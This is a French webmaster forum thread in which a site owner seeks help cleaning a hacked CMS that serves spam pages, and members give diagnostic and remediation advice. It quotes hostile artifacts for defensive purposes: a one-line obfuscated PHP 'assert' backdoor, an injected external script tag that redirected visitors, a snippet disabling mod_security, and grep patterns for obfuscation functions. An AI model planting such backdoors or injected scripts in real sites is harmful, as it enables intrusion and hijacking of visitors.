Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 14:01

Bonjour,

Je me permets de poster ici car je n'ai pas trouvé de rubrique plus adéquate.

Mon site s'est fait hacké depuis 1 mois ou plus, des intrus ont crées des pages mais je parviens pas à les trouver sur le ftp pour les supprimer ...

j'ai vraiment tout fouillé du coup je me demande comment ont ils pu faire ?

Voici quelques exemples de pages :
-http://smartphonx.fr/paid-web-hosting
-http://smartphonx.fr/namecheap-discount-coupons
-http://smartphonx.fr/sweden-vps
-http://smartphonx.fr/dedicated-server-florida

Il y en a une bonne vingtaine, en plus elles sont linkés et visités. Est ce que ca peut proser un problème niveau seo (pour le moment rien remarqué) ?



Merci pour votre aide
Haut
14 Réponses
Messages: 872

Enregistré le: 19 Fév 2003

Message le Mer Juil 08, 2015 14:10

le fichier .htaccess a-t-il été modifié ?
Haut
Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 14:25

J'avais trouvé ce code que j'ai viré depuis (je sais pas si c'est lié)

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Haut
Messages: 8554

Enregistré le: 14 Mai 2003

Message le Mer Juil 08, 2015 14:34

Cherche dans tout ton WP: eval(), base64_decode(), gzinflate(), str_rot13()
Les URLs hackées sont servies via du PHP.
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Mer Juil 08, 2015 15:13

un backdoor peut se cacher sans qu'il n'y ait de eval ou autre
il est impossible de trouver un backdoor uniquement en faisant une recherche

si c'est un cms, vaut mieux le réinstaller (dans un nouveau dossier), et sinon faut vérifier chaque fichier php un par un qu'il ne contient pas de code pas original
Haut
Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 15:17

merci pour vos réponses, il s'agit de quels fichiers ? eval(), base64_decode(), gzinflate(), str_rot13()
Haut
Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 15:19

madri2 a écrit:un backdoor peut se cacher sans qu'il n'y ait de eval ou autre
il est impossible de trouver un backdoor uniquement en faisant une recherche

si c'est un cms, vaut mieux le réinstaller (dans un nouveau dossier), et sinon faut vérifier chaque fichier php un par un qu'il ne contient pas de code pas original


ca va demandé du boulot mais je ne pense pas avoir le choix
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Mer Juil 08, 2015 15:23

si c'est un cms, faut vérifier chaque thème et plugin, s'il est à jour et s'il existe toujours (s'il a été supprimé c'est pas bon singe)
Haut
Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 15:23

J'avais aussi un problème avec un site du meme serveur, le code suivant avait été ajouté dans le header :

<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>
<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>

Ca généré une redirection de tous les internautes vers 2 ou 3 sites étranger et parfois meme vers google ...
Haut
Messages: 8554

Enregistré le: 14 Mai 2003

Message le Mer Juil 08, 2015 15:33

Oui mais dans son cas, ses pages piratées sont bien servies par PHP. Un grep ça prend même pas 30 sec..., autant essayer ça en premier.
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Mer Juil 08, 2015 15:37

sauf que grep n'est pas suffisant comme j'ai dit
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Mer Juil 08, 2015 15:45

pour info, voici un backdoor :
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>
Haut
Messages: 456

Enregistré le: 18 Oct 2011

Message le Mer Juil 08, 2015 16:26

Pour info c'est quoi un grep ?
Haut
Messages: 9031

Enregistré le: 22 Nov 2003

Message le Mer Juil 08, 2015 21:06

amrani13 a écrit:Bonjour,
Mon site s'est fait hacké depuis 1 mois ou plus, des intrus ont crées des pages mais je parviens pas à les trouver sur le ftp pour les supprimer ...

Forcément que tu ne les trouve pas en FTP puisque tu utilise un CMS: ils sont simplement repris dans les tables MySQL.

Ces BROL de CMS: facile à installer, facile à configurer, facile à paramétrer, facile à mettre à jour et ... facile à pirater quand ils ne sont pas mis à jour.

Une solution est effectivement de réinstaller complètement le site (à condition d'avoir une sauvegarde sur ton PC de la base de donnée et des différents fichiers). Pourtant, si un pirateur est passé: la faille existe encore -> retransfert et MISE à JOUR.
2. analyse via les logs du serveur / hébergement à la date du piratage pour comprendre d'où ca vient: IP et fichiers attaqués. -> interdiction de la plage IP qui a créé le problème par htaccess ou (serveur) IPtable.

Comme technicien informatique: quand un PC se prend des bestioles, je vérifie manuellement les programmes bizarres installés, quand ca me paraît un peu plus étrange: utilisation de logiciels spécialisés et quand je doute -> réinstall du PC. C'est la même chose pour un hébergement: en cas de doute -> réinstall. (j'ai la chance de ne pas utiliser de CMS mais aussi de bloquer tout ce qui ne me semble pas catholique .... : un jour j'en ais eut mare des bricoleurs).

Dans ton cas: pour essayer de corriger tu va devoir vérifier quasiment tous les fichiers maîtres ... index, catégorises, articles. Tous les fichiers (pardon contenu de tables) contenu. Tous les fichiers de navigation ... (de nouveau contenu des tables) .... Suis plutôt doué pour les bestioles mais manuellement, c'est quasiment impossible.

amrani13 a écrit:J'avais aussi un problème avec un site du meme serveur, le code suivant avait été ajouté dans le header :

<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>
<script type='text/javascript' src="http://gccanada.com/jquery.js"></script>

Ca généré une redirection de tous les internautes vers 2 ou 3 sites étranger et parfois même vers google ...

et ouvrent d'autres portes à d'autres bestioles. Et si tu as déjà trouver le site gccanada BLOQUE tous les accès par htaccess à partir de ce site.
Par contre, ce qui est génial: trouver un antivirus (même payant) pour LINUX ... impossible. Le monde "libre" est tellement persuadé qu'ils n'ont pas de risques :roll:

Reste à comprendre (comment interdire une plage de serveurs parasites): adresse du site 209.237.151.17 Hébergeur américain Hypersurf Internet Services, Inc (USA) site: -hypersurf.com avec plage d'adresse 209.237.0.0 - 209.237.63.255 Encore un hébergeur à supprimer. CIDR: 209.237.0.0/18
en htaccess:
Deny from 209.237.0.0/18
en IPTABLE: iptables -I INPUT -s 209.237.0.0/18 -j DROP
Haut
Messages: 8554

Enregistré le: 14 Mai 2003

Message le Mer Juil 08, 2015 22:27

8h plus tard et tjs pas trouvé ? 8O
Haut